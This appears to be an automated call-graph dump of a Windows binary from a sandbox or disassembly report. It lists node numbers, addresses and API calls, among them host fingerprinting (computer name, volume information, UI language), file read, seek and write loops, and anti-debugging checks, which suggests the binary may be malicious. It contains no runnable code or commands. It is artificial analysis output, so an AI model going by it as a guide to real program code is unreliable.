9786->9787 9788 10005b3c 9787->9788 9808 10005b56 9809 10005a9f 9808->9809 9810 10005c54 9809->9810 9811 10005d20 2 API calls 9809->9811 9810->9810 9812 10005b3c 9811->9812 10085 4015d7 SetUnhandledExceptionFilter 9743 10007cdd 9745 10007cf4 9743->9745 9746 10007e1a 9743->9746 9744 10007cfc WideCharToMultiByte 9744->9745 9744->9746 9745->9744 9745->9746 9186 10042c1a 9206 1004185b GetLastError 9186->9206 9188 10042c27 9226 10042d39 9188->9226 9190 10042c2f 9235 100429ae 9190->9235 9193 10042c46 9196 10042c89 9199 10042096 _free 20 API calls 9196->9199 9199->9193 9200 10042c84 9201 100415d3 __dosmaperr 20 API calls 9200->9201 9201->9196 9202 10042ccd 9202->9196 9259 10042884 9202->9259 9203 10042ca1 9203->9202 9204 10042096 _free 20 API calls 9203->9204 9204->9202 9207 10041871 9206->9207 9208 10041877 9206->9208 9209 10042206 __dosmaperr 11 API calls 9207->9209 9210 10042039 __dosmaperr 20 API calls 9208->9210 9212 100418c6 SetLastError 9208->9212 9209->9208 9211 10041889 9210->9211 9213 10041891 9211->9213 9214 1004225c __dosmaperr 11 API calls 9211->9214 9212->9188 9216 10042096 _free 20 API calls 9213->9216 9215 100418a6 9214->9215 9215->9213 9218 100418ad 9215->9218 9217 10041897 9216->9217 9219 100418d2 SetLastError 9217->9219 9220 10041797 __dosmaperr 20 API calls 9218->9220 9262 10041ff6 9219->9262 9221 100418b8 9220->9221 9223 10042096 _free 20 API calls 9221->9223 9225 100418bf 9223->9225 9225->9212 9225->9219 9227 10042d45 _abort 9226->9227 9228 1004185b _abort 38 API calls 9227->9228 9233 10042d4f 9228->9233 9230 10042dd3 _abort 9230->9190 9232 10041ff6 _abort 38 API calls 9232->9233 9233->9230 9233->9232 9234 10042096 _free 20 API calls 9233->9234 9428 10042813 RtlEnterCriticalSection 9233->9428 9429 10042dca 9233->9429 9234->9233 9433 1003fd79 9235->9433 9238 100429e1 9240 100429f8 9238->9240 9241 100429e6 GetACP 9238->9241 9239 100429cf GetOEMCP 9239->9240 9240->9193 9242 100432fa 9240->9242 9241->9240 9243 10043338 9242->9243 9247 10043308 __dosmaperr 9242->9247 9245 100415d3 __dosmaperr 20 API calls 9243->9245 9244 10043323 RtlAllocateHeap 9246 10042c57 9244->9246 9244->9247 9245->9246 9246->9196 9249 10042ddb 9246->9249 9247->9243 9247->9244 9248 10044356 __dosmaperr 7 API calls 9247->9248 9248->9247 9250 100429ae 40 API calls 9249->9250 9251 10042dfa 9250->9251 9254 10042e4b IsValidCodePage 9251->9254 9256 10042e01 9251->9256 9257 10042e70 _abort 9251->9257 9252 10044c0d _abort 5 API calls 9253 10042c7c 9252->9253 9253->9200 9253->9203 9255 10042e5d GetCPInfo 9254->9255 9254->9256 9255->9256 9255->9257 9256->9252 9584 10042a86 GetCPInfo 9257->9584 9657 10042841 9259->9657 9261 100428a8 9261->9196 9273 1004412e 9262->9273 9265 10042006 9267 10042010 IsProcessorFeaturePresent 9265->9267 9272 1004202e 9265->9272 9269 1004201b 9267->9269 9301 10041361 9269->9301 9307 1004402c 9272->9307 9310 1004409c 9273->9310 9276 1004414e 9277 1004415a _abort 9276->9277 9278 100418df __dosmaperr 20 API calls 9277->9278 9279 10044181 _abort 9277->9279 9283 10044187 _abort 9277->9283 9278->9279 9280 100441d3 9279->9280 9279->9283 9286 100441b6 9279->9286 9281 100415d3 __dosmaperr 20 API calls 9280->9281 9282 100441d8 9281->9282 9324 10041517 9282->9324 9287 100441ff 9283->9287 9327 10042813 RtlEnterCriticalSection 9283->9327 9286->9265 9288 1004425e 9287->9288 9290 10044256 9287->9290 9298 10044289 9287->9298 9328 1004282a RtlLeaveCriticalSection 9287->9328 9288->9298 9329 10044145 9288->9329 9293 1004402c _abort 28 API calls 9290->9293 9293->9288 9295 1004185b _abort 38 API calls 9299 100442ec 9295->9299 9297 10044145 _abort 38 API calls 9297->9298 9332 1004430e 9298->9332 9299->9286 9300 1004185b _abort 38 API calls 9299->9300 9300->9286 9302 1004137d _abort 9301->9302 9303 100413a9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9302->9303 9304 1004147a _abort 9303->9304 9305 10044c0d _abort 5 API calls 9304->9305 9306 10041498 9305->9306 9306->9272 9352 10043e24 9307->9352 9309 10042038 9313 10044042 9310->9313 9312 10041ffb 9312->9265 9312->9276 9314 1004404e _abort 9313->9314 9319 10042813 RtlEnterCriticalSection 9314->9319 9316 1004405c 9320 10044090 9316->9320 9318 10044083 _abort 9318->9312 9319->9316 9323 1004282a RtlLeaveCriticalSection 9320->9323 9322 1004409a 9322->9318 9323->9322 9336 1004149c 9324->9336 9326 10041523 9326->9286 9327->9287 9328->9290 9330 1004185b _abort 38 API calls 9329->9330 9331 1004414a 9330->9331 9331->9297 9333 10044314 9332->9333 9334 100442dd 9332->9334 9351 1004282a RtlLeaveCriticalSection 9333->9351 9334->9286 9334->9295 9334->9299 9337 100418df __dosmaperr 20 API calls 9336->9337 9338 100414b2 9337->9338 9339 10041511 9338->9339 9340 100414c0 9338->9340 9347 10041527 IsProcessorFeaturePresent 9339->9347 9345 10044c0d _abort 5 API calls 9340->9345 9342 10041516 9343 1004149c _abort 26 API calls 9342->9343 9344 10041523 9343->9344 9344->9326 9346 100414e7 9345->9346 9346->9326 9348 10041532 9347->9348 9349 10041361 _abort 8 API calls 9348->9349 9350 10041547 GetCurrentProcess TerminateProcess 9349->9350 9350->9342 9351->9334 9353 10043e30 _abort 9352->9353 9354 10043e48 9353->9354 9371 10043f7e GetModuleHandleW 9353->9371 9380 10042813 RtlEnterCriticalSection 9354->9380 9358 10043eee 9388 10043f2e 9358->9388 9361 10043e50 9361->9358 9363 10043ec5 9361->9363 9381 100449a3 9361->9381 9364 10043edd 9363->9364 9384 100447ae 9363->9384 9368 100447ae _abort 5 API calls 9364->9368 9365 10043f37 9365->9309 9368->9358 9372 10043e3c 9371->9372 9372->9354 9373 10043fc2 GetModuleHandleExW 9372->9373 9374 10043fec GetProcAddress 9373->9374 9377 10044001 9373->9377 9374->9377 9375 10044015 FreeLibrary 9376 1004401e 9375->9376 9378 10044c0d _abort 5 API calls 9376->9378 9377->9375 9377->9376 9379 10044028 9378->9379 9379->9354 9380->9361 9399 1004485b 9381->9399 9385 100447dd 9384->9385 9386 10044c0d _abort 5 API calls 9385->9386 9387 10044806 9386->9387 9387->9364 9421 1004282a RtlLeaveCriticalSection 9388->9421 9390 10043f07 9390->9365 9391 10043f3d 9390->9391 9422 100423fb 9391->9422 9394 10043f6b 9397 10043fc2 _abort 8 API calls 9394->9397 9395 10043f4b GetPEB 9395->9394 9396 10043f5b GetCurrentProcess TerminateProcess 9395->9396 9396->9394 9398 10043f73 ExitProcess 9397->9398 9402 1004480a 9399->9402 9401 1004487f 9401->9363 9403 10044816 _abort 9402->9403 9410 10042813 RtlEnterCriticalSection 9403->9410 9405 10044824 9411 10044883 9405->9411 9409 10044842 _abort 9409->9401 9410->9405 9414 100448a3 9411->9414 9415 100448ab 9411->9415 9412 10044c0d _abort 5 API calls 9413 10044831 9412->9413 9417 1004484f 9413->9417 9414->9412 9415->9414 9416 10042096 _free 20 API calls 9415->9416 9416->9414 9420 1004282a RtlLeaveCriticalSection 9417->9420 9419 10044859 9419->9409 9420->9419 9421->9390 9423 10042420 9422->9423 9425 10042416 9422->9425 9424 100420ef __dosmaperr 5 API calls 9423->9424 9424->9425 9426 10044c0d _abort 5 API calls 9425->9426 9427 1004247e 9426->9427 9427->9394 9427->9395 9428->9233 9432 1004282a RtlLeaveCriticalSection 9429->9432 9431 10042dd1 9431->9233 9432->9431 9434 1003fd96 9433->9434 9435 1003fd8c 9433->9435 9434->9435 9436 1004185b _abort 38 API calls 9434->9436 9435->9238 9435->9239 9437 1003fdb7 9436->9437 9441 10041964 9437->9441 9442 10041977 9441->9442 9444 1003fdd0 9441->9444 9442->9444 9449 1004274c 9442->9449 9445 10041991 9444->9445 9446 100419a4 9445->9446 9447 100419b9 9445->9447 9446->9447 9448 10042d39 __fassign 38 API calls 9446->9448 9447->9435 9448->9447 9450 10042758 _abort 9449->9450 9451 1004185b _abort 38 API calls 9450->9451 9452 10042761 9451->9452 9456 100427af _abort 9452->9456 9461 10042813 RtlEnterCriticalSection 9452->9461 9454 1004277f 9462 100427c3 9454->9462 9456->9444 9460 10041ff6 _abort 38 API calls 9460->9456 9461->9454 9463 10042793 9462->9463 9464 100427d1 __fassign 9462->9464 9466 100427b2 9463->9466 9464->9463 9469 100424ff 9464->9469 9583 1004282a RtlLeaveCriticalSection 9466->9583 9468 100427a6 9468->9456 9468->9460 9470 1004257f 9469->9470 9474 10042515 9469->9474 9471 100425cd 9470->9471 9473 10042096 _free 20 API calls 9470->9473 9537 10042672 9471->9537 9475 100425a1 9473->9475 9474->9470 9476 10042548 9474->9476 9481 10042096 _free 20 API calls 9474->9481 9477 10042096 _free 20 API calls 9475->9477 9478 1004256a 9476->9478 9483 10042096 _free 20 API calls 9476->9483 9479 100425b4 9477->9479 9480 10042096 _free 20 API calls 9478->9480 9482 10042096 _free 20 API calls 9479->9482 9484 10042574 9480->9484 9486 1004253d 9481->9486 9489 100425c2 9482->9489 9490 1004255f 9483->9490 9491 10042096 _free 20 API calls 9484->9491 9485 1004263b 9492 10042096 _free 20 API calls 9485->9492 9497 10043073 9486->9497 9487 100425db 9487->9485 9495 10042096 20 API calls _free 9487->9495 9493 10042096 _free 20 API calls 9489->9493 9525 10043171 9490->9525 9491->9470 9496 10042641 9492->9496 9493->9471 9495->9487 9496->9463 9498 10043084 9497->9498 9524 1004316d 9497->9524 9499 10042096 _free 20 API calls 9498->9499 9500 10043095 9498->9500 9499->9500 9501 100430a7 9500->9501 9502 10042096 _free 20 API calls 9500->9502 9503 100430b9 9501->9503 9505 10042096 _free 20 API calls 9501->9505 9502->9501 9504 100430cb 9503->9504 9506 10042096 _free 20 API calls 9503->9506 9507 100430dd 9504->9507 9508 10042096 _free 20 API calls 9504->9508 9505->9503 9506->9504 9509 100430ef 9507->9509 9510 10042096 _free 20 API calls 9507->9510 9508->9507 9511 10043101 9509->9511 9513 10042096 _free 20 API calls 9509->9513 9510->9509 9512 10043113 9511->9512 9514 10042096 _free 20 API calls 9511->9514 9515 10043125 9512->9515 9516 10042096 _free 20 API calls 9512->9516 9513->9511 9514->9512 9517 10043137 9515->9517 9518 10042096 _free 20 API calls 9515->9518 9516->9515 9519 10043149 9517->9519 9521 10042096 _free 20 API calls 9517->9521 9518->9517 9520 1004315b 9519->9520 9522 10042096 _free 20 API calls 9519->9522 9523 10042096 _free 20 API calls 9520->9523 9520->9524 9521->9519 9522->9520 9523->9524 9524->9476 9526 1004317e 9525->9526 9536 100431d6 9525->9536 9527 1004318e 9526->9527 9528 10042096 _free 20 API calls 9526->9528 9529 100431a0 9527->9529 9530 10042096 _free 20 API calls 9527->9530 9528->9527 9531 10042096 _free 20 API calls 9529->9531 9534 100431b2 9529->9534 9530->9529 9531->9534 9532 10042096 _free 20 API calls 9533 100431c4 9532->9533 9535 10042096 _free 20 API calls 9533->9535 9533->9536 9534->9532 9534->9533 9535->9536 9536->9478 9538 1004269d 9537->9538 9539 1004267f 9537->9539 9538->9487 9539->9538 9543 10043216 9539->9543 9542 10042096 _free 20 API calls 9542->9538 9544 10042697 9543->9544 9545 10043227 9543->9545 9544->9542 9579 100431da 9545->9579 9548 100431da __fassign 20 API calls 9549 1004323a 9548->9549 9550 100431da __fassign 20 API calls 9549->9550 9551 10043245 9550->9551 9552 100431da __fassign 20 API calls 9551->9552 9553 10043250 9552->9553 9554 100431da __fassign 20 API calls 9553->9554 9555 1004325e 9554->9555 9556 10042096 _free 20 API calls 9555->9556 9557 10043269 9556->9557 9558 10042096 _free 20 API calls 9557->9558 9559 10043274 9558->9559 9560 10042096 _free 20 API calls 9559->9560 9561 1004327f 9560->9561 9562 100431da __fassign 20 API calls 9561->9562 9563 1004328d 9562->9563 9564 100431da __fassign 20 API calls 9563->9564 9565 1004329b 9564->9565 9566 100431da __fassign 20 API calls 9565->9566 9567 100432ac 9566->9567 9568 100431da __fassign 20 API calls 9567->9568 9569 100432ba 9568->9569 9570 100431da __fassign 20 API calls 9569->9570 9571 100432c8 9570->9571 9572 10042096 _free 20 API calls 9571->9572 9573 100432d3 9572->9573 9574 10042096 _free 20 API calls 9573->9574 9575 100432de 9574->9575 9576 10042096 _free 20 API calls 9575->9576 9577 100432e9 9576->9577 9578 10042096 _free 20 API calls 9577->9578 9578->9544 9580 10043211 9579->9580 9581 10043201 9579->9581 9580->9548 9581->9580 9582 10042096 _free 20 API calls 9581->9582 9582->9581 9583->9468 9585 10042b6a 9584->9585 9589 10042ac0 9584->9589 9588 10044c0d _abort 5 API calls 9585->9588 9591 10042c16 9588->9591 9594 100434ff 9589->9594 9591->9256 9593 10044706 43 API calls 9593->9585 9595 1003fd79 __fassign 38 API calls 9594->9595 9596 1004351f MultiByteToWideChar 9595->9596 9598 100435f5 9596->9598 9599 1004355d 9596->9599 9600 10044c0d _abort 5 API calls 9598->9600 9602 100432fa 21 API calls 9599->9602 9605 1004357e _abort 9599->9605 9603 10042b21 9600->9603 9601 100435ef 9613 1004361c 9601->9613 9602->9605 9608 10044706 9603->9608 9605->9601 9606 100435c3 MultiByteToWideChar 9605->9606 9606->9601 9607 100435df GetStringTypeW 9606->9607 9607->9601 9609 1003fd79 __fassign 38 API calls 9608->9609 9610 10044719 9609->9610 9617 100444e9 9610->9617 9614 10043628 9613->9614 9616 10043639 9613->9616 9615 10042096 _free 20 API calls 9614->9615 9614->9616 9615->9616 9616->9598 9618 10044504 9617->9618 9619 1004452a MultiByteToWideChar 9618->9619 9620 10044554 9619->9620 9621 100446de 9619->9621 9624 100432fa 21 API calls 9620->9624 9627 10044575 9620->9627 9622 10044c0d _abort 5 API calls 9621->9622 9623 10042b42 9622->9623 9623->9593 9624->9627 9625 1004462a 9630 1004361c __freea 20 API calls 9625->9630 9626 100445be MultiByteToWideChar 9626->9625 9628 100445d7 9626->9628 9627->9625 9627->9626 9644 10042317 9628->9644 9630->9621 9632 10044601 9632->9625 9635 10042317 11 API calls 9632->9635 9633 10044639 9634 100432fa 21 API calls 9633->9634 9637 1004465a 9633->9637 9634->9637 9635->9625 9636 100446cf 9639 1004361c __freea 20 API calls 9636->9639 9637->9636 9638 10042317 11 API calls 9637->9638 9640 100446ae 9638->9640 9639->9625 9640->9636 9641 100446bd WideCharToMultiByte 9640->9641 9641->9636 9642 100446fd 9641->9642 9643 1004361c __freea 20 API calls 9642->9643 9643->9625 9645 100420ef __dosmaperr 5 API calls 9644->9645 9646 1004233e 9645->9646 9649 10042347 9646->9649 9652 1004239f 9646->9652 9650 10044c0d _abort 5 API calls 9649->9650 9651 10042399 9650->9651 9651->9625 9651->9632 9651->9633 9653 100420ef __dosmaperr 5 API calls 9652->9653 9654 100423c6 9653->9654 9655 10044c0d _abort 5 API calls 9654->9655 9656 10042387 LCMapStringW 9655->9656 9656->9649 9658 1004284d _abort 9657->9658 9665 10042813 RtlEnterCriticalSection 9658->9665 9660 10042857 9666 100428ac 9660->9666 9664 10042870 _abort 9664->9261 9665->9660 9678 10042fcc 9666->9678 9668 100428fa 9669 10042fcc 26 API calls 9668->9669 9670 10042916 9669->9670 9671 10042fcc 26 API calls 9670->9671 9672 10042934 9671->9672 9673 10042864 9672->9673 9674 10042096 _free 20 API calls 9672->9674 9675 10042878 9673->9675 9674->9673 9692 1004282a RtlLeaveCriticalSection 9675->9692 9677 10042882 9677->9664 9679 10042fdd 9678->9679 9688 10042fd9 9678->9688 9680 10042fe4 9679->9680 9683 10042ff7 _abort 9679->9683 9681 100415d3 __dosmaperr 20 API calls 9680->9681 9682 10042fe9 9681->9682 9684 10041517 _abort 26 API calls 9682->9684 9685 10043025 9683->9685 9686 1004302e 9683->9686 9683->9688 9684->9688 9687 100415d3 __dosmaperr 20 API calls 9685->9687 9686->9688 9690 100415d3 __dosmaperr 20 API calls 9686->9690 9689 1004302a 9687->9689 9688->9668 9691 10041517 _abort 26 API calls 9689->9691 9690->9689 9691->9688 9692->9677 10094 4bf794 10095 4bf7a0 10094->10095 10095->10094 10096 4bf8b4 GetPEB 10095->10096 10097 4bf7e1 10095->10097 9026 100097e0 9030 10008645 9026->9030 9032 10008e26 9026->9032 9028 100098be GetFileSize 9028->9032 9032->9026 9032->9028 9032->9030 9034 1000987f ReadFile 9032->9034 9035 10009a1f 9032->9035 9038 1000848b 9032->9038 9041 100089b0 9032->9041 9042 1000b180 9032->9042 9055 10005f10 9032->9055 9033 10005d20 VirtualAlloc VirtualFree 9033->9038 9034->9032 9035->9030 9036 10009a29 SetFilePointerEx 9035->9036 9036->9030 9038->9030 9038->9033 9059 100084c0 9038->9059 9065 10011d60 9038->9065 9039 100084c0 2 API calls 9039->9041 9041->9030 9041->9039 9069 10005d20 9041->9069 9051 1000b0de 9042->9051 9043 1000b2a7 SetFilePointerEx 9044 1000b1df 9043->9044 9047 1000b1c6 9043->9047 9044->9032 9045 1000b196 9046 1000b3a6 9045->9046 9045->9047 9048 1000b3b2 9046->9048 9049 1000b328 SetFilePointerEx 9046->9049 9047->9044 9050 1000b2e0 WriteFile 9047->9050 9048->9032 9049->9032 9050->9032 9051->9042 9051->9043 9051->9045 9051->9049 9052 1000b0d0 SetFilePointerEx 9051->9052 9053 1000b253 9051->9053 9052->9051 9054 1000b054 9052->9054 9053->9032 9054->9032 9057 10005f13 9055->9057 9056 10006084 SetFilePointerEx 9056->9057 9057->9055 9057->9056 9058 10005d90 9057->9058 9058->9032 9063 1000848b 9059->9063 9060 10008645 9060->9038 9061 10011d60 2 API calls 9061->9063 9062 10005d20 VirtualAlloc VirtualFree 9062->9063 9063->9059 9063->9060 9063->9061 9063->9062 9064 100084c0 2 API calls 9063->9064 9064->9059 9066 10011d76 9065->9066 9068 10011d62 9065->9068 9066->9038 9067 10005d20 2 API calls 9067->9068 9068->9038 9068->9066 9068->9067 9070 10005d22 9069->9070 9070->9041 9071 10005d39 VirtualAlloc 9070->9071 9073 10005d46 VirtualFree 9070->9073 9071->9070 9073->9041 10098 10048de0 10099 10048df9 __startOneArgErrorHandling 10098->10099 10101 10048e22 __startOneArgErrorHandling 10099->10101 10102 100436d2 10099->10102 10103 1004370b __startOneArgErrorHandling 10102->10103 10104 100439a3 __raise_exc RaiseException 10103->10104 10105 10043732 __startOneArgErrorHandling 10103->10105 10104->10105 10106 10043775 10105->10106 10108 10043750 10105->10108 10107 10043c94 __startOneArgErrorHandling 20 API calls 10106->10107 10110 10043770 __startOneArgErrorHandling 10107->10110 10113 10043cc3 10108->10113 10111 10044c0d _abort 5 API calls 10110->10111 10112 10043799 10111->10112 10112->10101 10114 10043cd2 10113->10114 10115 10043d46 __startOneArgErrorHandling 10114->10115 10116 10043cf1 __startOneArgErrorHandling 10114->10116 10118 10043c94 __startOneArgErrorHandling 20 API calls 10115->10118 10117 10043655 __startOneArgErrorHandling 5 API calls 10116->10117 10119 10043d32 10117->10119 10121 10043d3f 10118->10121 10120 10043c94 __startOneArgErrorHandling 20 API calls 10119->10120 10119->10121 10120->10121 10121->10110 9813 401526 _controlfp 9814 40108c 15 API calls 9813->9814 9815 401580 9814->9815 9722 100058ac 9723 100058be 9722->9723 9724 100058d0 9722->9724 9725 100058d9 9724->9725 9726 10005d20 2 API calls 9724->9726 9726->9725 8830 1000aaf0 8831 1000ab06 8830->8831 8835 1000ab57 8831->8835 8836 10006490 8831->8836 8837 10005f10 8836->8837 8839 10005d90 8836->8839 8838 10006084 SetFilePointerEx 8837->8838 8837->8839 8838->8837 8840 1003faf0 8839->8840 8841 1003fafd 8840->8841 8844 1003fb84 8840->8844 8842 1003fb2a 8841->8842 8841->8844 8846 1004032f 8842->8846 8862 10041a1b 8842->8862 8847 1003fc05 8844->8847 8853 1003fbda 8844->8853 8846->8835 8850 1003fc38 8847->8850 8858 10040fe0 8847->8858 8850->8835 8851 10041167 8872 10040ff7 8851->8872 8852 1004116e 8855 10040fe0 __startOneArgErrorHandling 21 API calls 8852->8855 8853->8850 8853->8851 8853->8852 8857 10041173 8855->8857 8857->8835 8859 10041000 8858->8859 8876 10041c33 8859->8876 8863 10041a38 RtlDecodePointer 8862->8863 8865 10041a48 8862->8865 8863->8865 8864 10041ad5 8867 10041aca 8864->8867 8869 100415d3 __dosmaperr 20 API calls 8864->8869 8865->8864 8865->8867 8870 10041a7f 8865->8870 8866 10044c0d _abort 5 API calls 8868 100408d6 8866->8868 8867->8866 8868->8835 8869->8867 8870->8867 8871 100415d3 __dosmaperr 20 API calls 8870->8871 8871->8867 8873 10041000 8872->8873 8874 10041c33 __startOneArgErrorHandling 21 API calls 8873->8874 8875 10041020 8874->8875 8875->8835 8877 10041c72 __startOneArgErrorHandling 8876->8877 8882 10041cf4 __startOneArgErrorHandling 8877->8882 8886 10043980 8877->8886 8879 10041d1e 8881 10041d2a 8879->8881 8893 10043c94 8879->8893 8900 10044c0d 8881->8900 8882->8879 8889 10043655 8882->8889 8885 1003fc22 8885->8835 8907 100439a3 8886->8907 8890 1004367d 8889->8890 8891 10044c0d _abort 5 API calls 8890->8891 8892 1004369a 8891->8892 8892->8879 8894 10043cb6 8893->8894 8895 10043ca1 8893->8895 8897 100415d3 __dosmaperr 20 API calls 8894->8897 8896 10043cbb 8895->8896 8911 100415d3 8895->8911 8896->8881 8897->8896 8901 10044c16 8900->8901 8902 10044c18 IsProcessorFeaturePresent 8900->8902 8901->8885 8904 10044cb7 8902->8904 9025 10044c7b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8904->9025 8906 10044d9a 8906->8885 8908 100439ce __raise_exc 8907->8908 8909 10043bc7 RaiseException 8908->8909 8910 1004399e 8909->8910 8910->8882 8914 100418df GetLastError 8911->8914 8915 100418fe 8914->8915 8916 100418f8 8914->8916 8921 10041955 SetLastError 8915->8921 8940 10042039 8915->8940 8933 10042206 8916->8933 8920 10041918 8947 10042096 8920->8947 8923 100415d8 8921->8923 8923->8881 8926 1004191e 8928 1004194c SetLastError 8926->8928 8927 10041934 8960 10041797 8927->8960 8928->8923 8931 10042096 _free 17 API calls 8932 10041945 8931->8932 8932->8921 8932->8928 8965 100420ef 8933->8965 8935 1004222d 8936 10042245 TlsGetValue 8935->8936 8937 10042239 8935->8937 8936->8937 8938 10044c0d _abort 5 API calls 8937->8938 8939 10042256 8938->8939 8939->8915 8945 10042046 __dosmaperr 8940->8945 8941 10042086 8944 100415d3 __dosmaperr 19 API calls 8941->8944 8942 10042071 RtlAllocateHeap 8943 10041910 8942->8943 8942->8945 8943->8920 8953 1004225c 8943->8953 8944->8943 8945->8941 8945->8942 8978 10044356 8945->8978 8948 100420a1 HeapFree 8947->8948 8952 100420ca __dosmaperr 8947->8952 8949 100420b6 8948->8949 8948->8952 8950 100415d3 __dosmaperr 18 API calls 8949->8950 8951 100420bc GetLastError 8950->8951 8951->8952 8952->8926 8954 100420ef __dosmaperr 5 API calls 8953->8954 8955 10042283 8954->8955 8956 1004229e TlsSetValue 8955->8956 8957 10042292 8955->8957 8956->8957 8958 10044c0d _abort 5 API calls 8957->8958 8959 1004192d 8958->8959 8959->8920 8959->8927 8993 1004176f 8960->8993 8966 1004211f __dosmaperr 8965->8966 8969 1004211b 8965->8969 8966->8935 8967 1004213f 8967->8966 8970 1004214b GetProcAddress 8967->8970 8969->8966 8969->8967 8971 1004218b 8969->8971 8970->8966 8972 100421a1 8971->8972 8973 100421ac LoadLibraryExW 8971->8973 8972->8969 8974 100421c9 GetLastError 8973->8974 8976 100421e1 8973->8976 8975 100421d4 LoadLibraryExW 8974->8975 8974->8976 8975->8976 8976->8972 8977 100421f8 FreeLibrary 8976->8977 8977->8972 8983 1004439a 8978->8983 8980 10044c0d _abort 5 API calls 8981 10044396 8980->8981 8981->8945 8982 1004436c 8982->8980 8984 100443a6 _abort 8983->8984 8989 10042813 RtlEnterCriticalSection 8984->8989 8986 100443b1 8990 100443e3 8986->8990 8988 100443d8 _abort 8988->8982 8989->8986 8991 1004282a _abort RtlLeaveCriticalSection 8990->8991 8992 100443ea 8991->8992 8992->8988 8999 100416ff 8993->8999 8995 10041793 8996 10041747 8995->8996 9009 100416af 8996->9009 8998 1004176b 8998->8931 9000 1004170b _abort 8999->9000 9005 10042813 RtlEnterCriticalSection 9000->9005 9002 10041715 9006 1004173b 9002->9006 9004 10041733 _abort 9004->8995 9005->9002 9007 1004282a _abort RtlLeaveCriticalSection 9006->9007 9008 10041745 9007->9008 9008->9004 9010 100416bb _abort 9009->9010 9017 10042813 RtlEnterCriticalSection 9010->9017 9012 100416c5 9018 10041810 9012->9018 9014 100416dd 9022 100416f3 9014->9022 9016 100416eb _abort 9016->8998 9017->9012 9019 1004181f __fassign 9018->9019 9020 10041846 __fassign 9018->9020 9019->9020 9021 100424ff __fassign 20 API calls 9019->9021 9020->9014 9021->9020 9023 1004282a _abort RtlLeaveCriticalSection 9022->9023 9024 100416fd 9023->9024 9024->9016 9025->8906 9794 10001130 GetPEB 9816 10004b70 GetUserDefaultUILanguage 9817 10004b82 9816->9817 10086 10007db0 10087 10007d08 10086->10087 10088 10007cfc WideCharToMultiByte 10087->10088 10089 10007e39 10087->10089 10088->10087 10088->10089 9727 100422b5 9728 100420ef __dosmaperr 5 API calls 9727->9728 9729 100422dc 9728->9729 9730 100422fa InitializeCriticalSectionAndSpinCount 9729->9730 9731 100422e5 9729->9731 9730->9731 9732 10044c0d _abort 5 API calls 9731->9732 9733 10042311 9732->9733 10122 10027df0 10126 10027d20 10122->10126 10123 10027e06 GetComputerNameW 10128 10027d37 10123->10128 10124 10027d30 10125 10027d6c GetVolumeInformationW 10124->10125 10124->10128 10126->10122 10126->10123 10126->10124 10126->10125 10127 10027d83 GetWindowsDirectoryW 10126->10127 10126->10128 10127->10124 10127->10128 9818 10047977 9819 10047984 9818->9819 9820 10047999 9818->9820 9821 100415d3 __dosmaperr 20 API calls 9819->9821 9825 10047994 9820->9825 9834 10047671 9820->9834 9822 10047989 9821->9822 9824 10041517 _abort 26 API calls 9822->9824 9824->9825 9830 100479bb 9851 10048664 9830->9851 9833 10042096 _free 20 API calls 9833->9825 9835 10047685 9834->9835 9836 10047689 9834->9836 9840 100477ff 9835->9840 9836->9835 9837 10047951 26 API calls 9836->9837 9838 100476a9 9837->9838 9866 1004812c 9838->9866 9841 10047815 9840->9841 9842 10047826 9840->9842 9841->9842 9843 10042096 _free 20 API calls 9841->9843 9844 10047951 9842->9844 9843->9842 9845 10047972 9844->9845 9846 1004795d 9844->9846 9845->9830 9847 100415d3 __dosmaperr 20 API calls 9846->9847 9848 10047962 9847->9848 9849 10041517 _abort 26 API calls 9848->9849 9850 1004796d 9849->9850 9850->9830 9852 10048673 9851->9852 9853 10048688 9851->9853 9854 100415c0 __dosmaperr 20 API calls 9852->9854 9855 100486c3 9853->9855 9860 100486af 9853->9860 9857 10048678 9854->9857 9856 100415c0 __dosmaperr 20 API calls 9855->9856 9858 100486c8 9856->9858 9859 100415d3 __dosmaperr 20 API calls 9857->9859 9862 100415d3 __dosmaperr 20 API calls 9858->9862 9863 100479c1 9859->9863 10039 1004863c 9860->10039 9864 100486d0 9862->9864 9863->9825 9863->9833 9865 10041517 _abort 26 API calls 9864->9865 9865->9863 9867 10048138 _abort 9866->9867 9868 10048140 9867->9868 9869 10048158 9867->9869 9891 100415c0 9868->9891 9870 100481f6 9869->9870 9875 1004818d 9869->9875 9872 100415c0 __dosmaperr 20 API calls 9870->9872 9874 100481fb 9872->9874 9877 100415d3 __dosmaperr 20 API calls 9874->9877 9894 10048423 RtlEnterCriticalSection 9875->9894 9876 100415d3 __dosmaperr 20 API calls 9879 1004814d _abort 9876->9879 9880 10048203 9877->9880 9879->9835 9882 10041517 _abort 26 API calls 9880->9882 9881 10048193 9883 100481c4 9881->9883 9884 100481af 9881->9884 9882->9879 9895 10048217 9883->9895 9885 100415d3 __dosmaperr 20 API calls 9884->9885 9887 100481b4 9885->9887 9888 100415c0 __dosmaperr 20 API calls 9887->9888 9889 100481bf 9888->9889 9946 100481ee 9889->9946 9892 100418df __dosmaperr 20 API calls 9891->9892 9893 100415c5 9892->9893 9893->9876 9894->9881 9896 10048245 9895->9896 9897 1004823e 9895->9897 9898 10048268 9896->9898 9899 10048249 9896->9899 9900 10044c0d _abort 5 API calls 9897->9900 9902 100482b9 9898->9902 9903 1004829c 9898->9903 9901 100415c0 __dosmaperr 20 API calls 9899->9901 9904 1004841f 9900->9904 9905 1004824e 9901->9905 9907 100482cf 9902->9907 9949 10048838 9902->9949 9906 100415c0 __dosmaperr 20 API calls 9903->9906 9904->9889 9908 100415d3 __dosmaperr 20 API calls 9905->9908 9912 100482a1 9906->9912 9952 10047dbc 9907->9952 9910 10048255 9908->9910 9913 10041517 _abort 26 API calls 9910->9913 9915 100415d3 __dosmaperr 20 API calls 9912->9915 9913->9897 9918 100482a9 9915->9918 9916 10048316 9922 10048370 WriteFile 9916->9922 9923 1004832a 9916->9923 9917 100482dd 9919 100482e1 9917->9919 9920 10048303 9917->9920 9921 10041517 _abort 26 API calls 9918->9921 9932 100483d7 9919->9932 9959 10047d4f 9919->9959 9964 10047b9c GetConsoleCP 9920->9964 9921->9897 9927 10048393 GetLastError 9922->9927 9933 100482f9 9922->9933 9924 10048360 9923->9924 9925 10048332 9923->9925 9990 10047e32 9924->9990 9928 10048337 9925->9928 9929 10048350 9925->9929 9927->9933 9928->9932 9975 10047f11 9928->9975 9982 10047fff 9929->9982 9932->9897 9935 100415d3 __dosmaperr 20 API calls 9932->9935 9933->9897 9933->9932 9936 100483b3 9933->9936 9938 100483fc 9935->9938 9940 